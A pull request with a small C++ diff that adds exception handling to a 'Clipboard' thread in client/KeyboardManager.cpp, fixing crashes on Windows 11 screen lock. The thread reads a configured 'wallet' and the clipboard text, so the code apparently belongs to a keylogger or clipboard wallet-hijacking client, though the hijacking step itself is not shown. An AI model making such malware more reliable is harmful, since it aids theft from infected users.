### PR TITLE
fix: "std::runtime_error" causing crashes in some cases

### DIFF
--- a/client/KeyboardManager.cpp
+++ b/client/KeyboardManager.cpp
@@ -485,7 +485,19 @@ DWORD WINAPI CKeyboardManager1::Clipboard(LPVOID lparam)
     CKeyboardManager1* pThis = (CKeyboardManager1*)lparam;
     while (pThis->m_bIsWorking) {
         auto w = pThis->GetWallet();
-        if (!w.empty() && clip::has(clip::text_format())) {
+        if (w.empty()){
+            Sleep(1000);
+            continue;
+		}
+        bool hasClipboard = false;
+        try {
+            hasClipboard = clip::has(clip::text_format());
+		}
+		catch (...) { // fix: "std::runtime_error" causing crashes in some cases
+            hasClipboard = false;
+            Sleep(3000);
+		}
+        if (hasClipboard) {
             std::string value;
             clip::get_text(value);
             if (value.length() > 200) {


### PR DESCRIPTION
On Windows 11 when user locks screen the `CKeyboardManager1::Clipboard` thread throw an error which causes client crash.